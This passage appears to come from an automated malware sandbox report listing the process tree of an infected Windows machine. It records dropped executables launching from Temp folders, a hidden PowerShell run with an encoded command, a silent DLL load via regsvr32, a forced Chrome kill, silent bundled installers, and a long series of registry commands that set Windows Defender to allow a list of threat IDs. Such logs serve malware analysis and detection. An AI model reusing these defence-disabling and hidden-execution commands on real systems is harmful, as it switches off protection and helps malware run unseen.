                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 5176 -s 600
                                                                                                                                          3⤵
                                                                                                                                          • Program crash
                                                                                                                                          PID:3792
                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 5176 -ip 5176
                                                                                                                                      1⤵
                                                                                                                                        PID:1412
                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 612 -p 60 -ip 60
                                                                                                                                        1⤵
                                                                                                                                          PID:5976
                                                                                                                                        • C:\Windows\system32\WerFault.exe
                                                                                                                                          C:\Windows\system32\WerFault.exe -pss -s 424 -p 5896 -ip 5896
                                                                                                                                          1⤵
                                                                                                                                            PID:3596
                                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                                                                                            C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                                                                                            1⤵
                                                                                                                                              PID:5776
                                                                                                                                            • C:\Windows\windefender.exe
                                                                                                                                              C:\Windows\windefender.exe
                                                                                                                                              1⤵
                                                                                                                                              • Executes dropped EXE
                                                                                                                                              PID:3128
                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\4F7E.exe
                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\4F7E.exe
                                                                                                                                              1⤵
                                                                                                                                                PID:4748
                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 620 -p 5312 -ip 5312
                                                                                                                                                1⤵
                                                                                                                                                  PID:2008
                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\5F1F.exe
                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\5F1F.exe
                                                                                                                                                  1⤵
                                                                                                                                                    PID:6128
                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\5F1F.exe
                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\5F1F.exe
                                                                                                                                                      2⤵
                                                                                                                                                        PID:5508
                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\5F1F.exe
                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\5F1F.exe" --Admin IsNotAutoStart IsNotTask
                                                                                                                                                          3⤵
                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                          PID:5896
                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\5F1F.exe
                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\5F1F.exe" --Admin IsNotAutoStart IsNotTask
                                                                                                                                                            4⤵
                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                            • Checks computer location settings
                                                                                                                                                            • Suspicious use of SetWindowsHookEx
                                                                                                                                                            PID:5372
                                                                                                                                                            • C:\Users\Admin\AppData\Local\7a66cbb1-ec7b-45b6-a698-77c790a7c003\build2.exe
                                                                                                                                                              "C:\Users\Admin\AppData\Local\7a66cbb1-ec7b-45b6-a698-77c790a7c003\build2.exe"
                                                                                                                                                              5⤵
                                                                                                                                                                PID:2856
                                                                                                                                                                • C:\Users\Admin\AppData\Local\7a66cbb1-ec7b-45b6-a698-77c790a7c003\build2.exe
                                                                                                                                                                  "C:\Users\Admin\AppData\Local\7a66cbb1-ec7b-45b6-a698-77c790a7c003\build2.exe"
                                                                                                                                                                  6⤵
                                                                                                                                                                    PID:4356
                                                                                                                                                        • C:\Windows\system32\regsvr32.exe
                                                                                                                                                          regsvr32 /s C:\Users\Admin\AppData\Local\Temp\73FF.dll
                                                                                                                                                          1⤵
                                                                                                                                                            PID:1156
                                                                                                                                                            • C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                              /s C:\Users\Admin\AppData\Local\Temp\73FF.dll
                                                                                                                                                              2⤵
                                                                                                                                                                PID:5468
                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\8064.exe
                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\8064.exe
                                                                                                                                                              1⤵
                                                                                                                                                                PID:3316
                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\Smart Clock\SmartClock.exe
                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\Smart Clock\SmartClock.exe"
                                                                                                                                                                  2⤵
                                                                                                                                                                    PID:2116
                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 3316 -s 592
                                                                                                                                                                    2⤵
                                                                                                                                                                    • Program crash
                                                                                                                                                                    PID:5808
                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\822A.exe
                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\822A.exe
                                                                                                                                                                  1⤵
                                                                                                                                                                    PID:1920
                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 624 -p 3316 -ip 3316
                                                                                                                                                                    1⤵
                                                                                                                                                                      PID:1872
                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\96EC.exe
                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\96EC.exe
                                                                                                                                                                      1⤵
                                                                                                                                                                        PID:1364
                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                          cmd.exe /c taskkill /f /im chrome.exe
                                                                                                                                                                          2⤵
                                                                                                                                                                            PID:228
                                                                                                                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                              taskkill /f /im chrome.exe
                                                                                                                                                                              3⤵
                                                                                                                                                                              • Kills process with taskkill
                                                                                                                                                                              PID:6008
                                                                                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe"
                                                                                                                                                                            2⤵
                                                                                                                                                                              PID:6136
                                                                                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7fff81784f50,0x7fff81784f60,0x7fff81784f70
                                                                                                                                                                                3⤵
                                                                                                                                                                                  PID:5480
                                                                                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1700,6551434391176492533,7655211866362565852,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1808 /prefetch:8
                                                                                                                                                                                  3⤵
                                                                                                                                                                                    PID:1364
                                                                                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1700,6551434391176492533,7655211866362565852,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1712 /prefetch:2
                                                                                                                                                                                    3⤵
                                                                                                                                                                                      PID:1148
                                                                                                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1700,6551434391176492533,7655211866362565852,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2316 /prefetch:8
                                                                                                                                                                                      3⤵
                                                                                                                                                                                        PID:2396
                                                                                                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1700,6551434391176492533,7655211866362565852,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2868 /prefetch:1
                                                                                                                                                                                        3⤵
                                                                                                                                                                                          PID:2832
                                                                                                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1700,6551434391176492533,7655211866362565852,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2852 /prefetch:1
                                                                                                                                                                                          3⤵
                                                                                                                                                                                            PID:1392
                                                                                                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1700,6551434391176492533,7655211866362565852,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3460 /prefetch:1
                                                                                                                                                                                            3⤵
                                                                                                                                                                                              PID:6184
                                                                                                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1700,6551434391176492533,7655211866362565852,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3732 /prefetch:1
                                                                                                                                                                                              3⤵
                                                                                                                                                                                                PID:6276
                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\A332.exe
                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\A332.exe
                                                                                                                                                                                            1⤵
                                                                                                                                                                                              PID:5696
                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\is-3AB92.tmp\A332.tmp
                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\is-3AB92.tmp\A332.tmp" /SL5="$305B0,140559,56832,C:\Users\Admin\AppData\Local\Temp\A332.exe"
                                                                                                                                                                                                2⤵
                                                                                                                                                                                                  PID:1332
                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\is-E2SRR.tmp\3alouch.exe
                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\is-E2SRR.tmp\3alouch.exe" /S /UID=lylal220
                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                      PID:4772
                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\21-dc743-315-170b3-61b94ab03903b\Walaetycyzhy.exe
                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\21-dc743-315-170b3-61b94ab03903b\Walaetycyzhy.exe"
                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                          PID:5756
                                                                                                                                                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e6
                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                              PID:6288
                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7a-bcfd4-829-59e98-b1b605784e9d7\Loduhyliwu.exe
                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\7a-bcfd4-829-59e98-b1b605784e9d7\Loduhyliwu.exe"
                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                              PID:2960
                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\GMCYKWUVWA\irecord.exe
                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\GMCYKWUVWA\irecord.exe" /VERYSILENT
                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                PID:4208
                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\is-RVGOT.tmp\irecord.tmp
                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\is-RVGOT.tmp\irecord.tmp" /SL5="$70470,5808768,66560,C:\Users\Admin\AppData\Local\Temp\GMCYKWUVWA\irecord.exe" /VERYSILENT
                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                    PID:5392
                                                                                                                                                                                                                    • C:\Program Files (x86)\i-record\I-Record.exe
                                                                                                                                                                                                                      "C:\Program Files (x86)\i-record\I-Record.exe" -silent -desktopShortcut -programMenu
                                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                                        PID:6864
                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\AB8F.exe
                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\AB8F.exe
                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                PID:4192
                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\AB8F.exe
                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\AB8F.exe
                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                    PID:2160
                                                                                                                                                                                                                • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                  C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                    PID:388
                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 388 -s 884
                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                      • Program crash
                                                                                                                                                                                                                      PID:3632
                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\XPKruKcwkyRJuFApW\EdLqPAaTytMGRMX\yDetIJX.exe
                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\XPKruKcwkyRJuFApW\EdLqPAaTytMGRMX\yDetIJX.exe bH /site_id 525403 /S
                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                      PID:4392
                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                        powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;"
                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                          PID:4608
                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                            "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                              PID:4984
                                                                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                  PID:924
                                                                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                  PID:3328
                                                                                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                    PID:392
                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                      PID:5788
                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                        PID:6296
                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                          PID:6496
                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                            PID:6884
                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                              PID:6908
                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                PID:6952
                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                  PID:6968
                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                    PID:6992
                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                      PID:7008
                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                        PID:7024
                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                          PID:7040
                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                            PID:7060
                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                              PID:7080
                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                PID:7096
                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                  PID:7116
                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                    PID:4552
                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                      PID:2540
                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                        PID:2580
                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                          PID:4444
                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                            PID:228
                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                              PID:2960
                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
